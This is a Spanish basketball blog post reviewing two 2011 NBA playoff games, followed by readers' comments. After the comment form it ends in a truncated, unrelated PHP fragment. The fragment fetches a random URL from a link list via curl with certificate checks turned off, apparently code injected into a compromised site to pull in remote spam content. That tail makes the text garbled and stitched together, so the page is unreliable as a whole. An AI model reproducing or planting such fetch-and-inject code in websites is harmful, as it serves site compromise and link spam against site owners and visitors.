Playoffs (03/05/2011): El Big Three nuevo se come al viejo

04 de May de 2011 por TheDeerHunter

El eje de los últimos Celtics campeones está atascado. Sobrepasados por una versión corregida y aumentada de si mismos. Nunca antes desde que comenzó el actual proyecto se habían encontrado con un 2-0 en contra, ni siquiera con el tridente roto. Nunca antes sus sistemas defensivos habían sido profanados de esta forma. Sólo el legendario orgullo celtic y el ambiente del Garden de Boston puede volver a ponerles en órbita. Los precedentes no son buenos pues no han habido muchos que hayan remontado un desventaja como esta. Romper el quinteto invencible fue un mal presagio.

El trío de Miami les hizo roto anoche de 80 puntos y 26 rebotes, rematando con un parcial de 14-0 en el último cuarto. Hasta ese momento los verdes habían dado mucha más guerra que en el pasado encuentro con un buen Rondo, junto a un correcto Garnett y una digna producción del banco. Sin embargo Pierce y Allen eran machacados por sus pares. Con tanta distancia entre los respectivos Big Three, el nuevo y el viejo, los Heat podrían cerrar su pase a la final pronto. Veremos si Shaq puede llegar a tiempo cual Séptimo de Caballería.

En la otra eliminatoria los Thunder lograron estrenar su casillero. Menos absorción de juego por parte de Durant y Westbrook, un gran aumento de prestaciones del banco con Harden y Maynor involucradísimos… pero por encima de todo Brooks logró hacer funcionar su defensa, deteniendo la sangría de Gasol&Randolph y provocando, a diferencia del primer partido, un alto número de pérdidas por partido.

PREMIOS

MVP: Lebron James nos ofreció ayer otra de tantas exhibiciones a las que acostumbra. Anoche fueron 35 puntos y 7 rebotes, 24 de ellos en la segunda parte.

Sorpresa: Pedíamos que la 2ª unidad de los Thunder diera un paso al frente y James Harden escuchó nuestro comentarios. Con 21 puntos, 5 rebotes y 3 asistencias fue, incluso, el mejor de su equipo.

Decepción: Esta vez las torres grizzlies estuvieron muy desacertadas. Con Zach Randolph anotando 2 de sus 13 lanzamientos y Marc Gasol anotando 3 de 9, no hay nada que hacer.

Esfuerzo en vano: Mike Conley fue el mejor de su equipo con 24 puntos (10 de 15) y 8 asistencias mientras que Rajon Rondo fue el mejor del suyo con 20 puntos, 6 rebotes y 12 asistencias. Ambos salieron derrotados de la cancha.

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. GreenPride dice:
    #1

    ¿Noche de relevo generacional en el Este? Anoche Wade y LeBron llamaron a la puerta de los Celtics. Los verdes parecen demasiado viejos y fatigados ante estos nuevos Heat. Dicho lo cual a 7 minutos del final el partido marchaba empatado a 80 hasta que un 14-0 de la mano de LeBron mató a los Celtics. Pero las sensaciones son que los Heat van claramente por delante de los verdes y no sólo por el 2-0 en la eliminatoria. Bibby está haciendo un trabajo decente con Rondo aunque esté ayer dió más quebraderos de cabeza a los de Miami y Wade y LeBron están machacando a Ray Allen y Paul Pierce en ambos lados de la cancha. Los Celtics siempre encuentran a uno de los 2 en racha en ataque (Wade en el segundo cuarto, LeBron en toda la segunda parte) y se ven con muchos problemas a la hora de anotar ante la piernas jóvenes de los Heat. Allen no tuvo los tiros del primer partido y está tocado, igual que Pierce con un pie en un estado menos que regular y que no puede con la defensa del rey. Sólo Garnett mantiene ligeramente a su favor el duelo con Bosh pero no es ni mucho menos suficiente a pesar de que el banco verde funcionó ayer con buenos partidos de Delonte West y Jeff Green. Para remontar hará falta un giro radical de la eliminatoria en el Garden, veremos si la presencia de Shaq anima a los Celtics y si Allen y Pierce encuentran ritmo ofensivo pero ahora mismo parece difícil que puedan voltear la eliminatoria que se les pone muy cuesta arriba.
    En el Oeste Oklahoma reaccionó en casa para empatar la serie con los Grizzlies a base de defensa interior. Si en el anterior partido la sangría por dentro fue de campeonato esta vez Perkins-Mohamed-Collins-Ibaka hicieron un gran trabajo sobre Randolph&Gasol que tuvieron unos porcentajes muy malos. Conley intentó mantener a los suyos con un gran partido ofensivo pero le faltaron los puntos interiores. Westbrook jugó un buen partido esta vez sin chupar tanto y el banquillo de los Thunder las metió de fuera con Maynor y Harden muy activos. Si Memphis pierde los puntos en la pintura no tendrán nada que hacer aunque no se rindieron hasta el final bajando la diferencia de 20 a 7. Se plantea una gran serie y veremos si en Memphis los Thunder pueden jugar tan agresivo y controlar tanto a los interiores de los Grizzlies.

      Citar

  2. Rompe dice:
    #2

    No veo yo a Shaq tan milagroso como lo pintan por ahí. Un tipo de su edad, con el tiempo que lleva sin jugar, y sin un período mínimo de adaptación antes, no creo que le de miedo a nadie, y menos a estos Heat. Salvo milagro del Garden, esa eliminatoria está decidida.
    Mucho más abierta veo la del Oeste. En el 3º partido qué versión veremos de Zach&Marc? Sin duda el pase a la final pasa por sus manos, al igual que pasó en primera ronda.

      Citar

  3. Viva_Dirk dice:
    #3

    Los Celtics se han encontrado con el peor rival posible, son físicamente mucho mas poderosos, Lebron es un excelente defensor para Pierce y Wade para Allen, Garnett no puede marcar diferencias frente a Bosh y Rondo se va a encontrar con muchas ayudas. El primer paso para Boston debe ser controlar el rebote y bajar el ritmo de los partidos, y ahí si puede ayudar mucho Shaq.

    Sigo viendo a Memphis en la final, los Thunder van a necesitar lo de hoy, casi 50 puntos desde el banco y a sus estrellas encontrando al compañero libre.

      Citar

  4. Denise dice:
    #4

    Shaq? who’s Shaq? Si los dos O´Neal están acabados. De verdad que alguien pensaba que los Celtics iban a ganarle a los Heat? Si la final entre Lakers y Heat está clarisima.

      Citar

  5. -=TheKing=- dice:
    #5

    Yo no veo tan claro a los Lakeres, si llegan a la final será con muchos partidos encima y creo que les pasará factura. Además Nowi lo va a dar todo porque es su última oportunidad creo………

      Citar

  6. HisRoyalAirness dice:
    #6

    La frase who’ s Shaq debería ser motivo de baneo o algo así Denise…
    Yo creo que Diesel puede ser una ayuda muy grande, tanto por intimidación y defensa como por carisma y experiencia. Es más, con Shaq delante, Bosh ni se acerca por el aro.
    Lo que está claro es que Ray no está en condiciones físicas de defender a Wade

      Citar

  7. Javijaen dice:
    #7

    Coincido con mucho de lo dicho, y a tener en cuenta que Garnett sí que puede con Bosh, pero Allen sufre muchísimo con Wade que únicamente le defiende y por cierto muy bien. Pierce parece que sigue perdido desde su exclusión, y necesitará mucho más contra Lebron. Si Boston no gana sus dos partidos de casa, está todo dicho. Por cierto, 27 puntos del banco de Boston por 12 del de Heat. Pero es engañoso, ya que West y Green metieron 21 puntos y poquito más. A destacar el buen partido de Joel Anthony, mejor incluso que el primero.
    Por parte de Okl-Mem, sigo pensando lo mismo, si Zach Randolph aguanta el ritmo de Durant (más o menos), el partido será de Memphis, si no, victoria de Oklahoma. Por ahí pueden ir los tiros…

      Citar

  8. Denise dice:
    #8

    @royal: ojala vuelva pronto Shaq para ver que es capaz de hacer con 39 años y después de todos los problemas fisicos sufridos esta campaña y todo el tiempo que lleva sin jugar. En mi opinion, 12-15 minutillos de calidad y mucho es…y porque Miami no tiene interiores de garantías. Aunque aún así seguro que daba más rendimiento que Krstic o que Murphy, vaya tela, que manera de cagarla con lo de Perkins.

      Citar

  9. Sempren dice:
    #9

    A mí Rondo me está decepcionando. En el primer partido estuvo muy out, y en el segundo… generaba pánico cuando tenía el balón a 6 metros y estaba totalmente solo, pero pánico en los verdes, a que se la tirase.
    En la final del año pasado, en la que Kobe tanto le flotaba, Rondo tiraba mal, pero creo que no tan mal, alguna metía, pero este año… ni le tocan aro, se le van fuera por mucho…
    Incluso creo que tiene muchas pérdidas estúpidas para un base de primer nivel.
    Eso sí, cuando penetra, es difícil que le hagan sombra.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>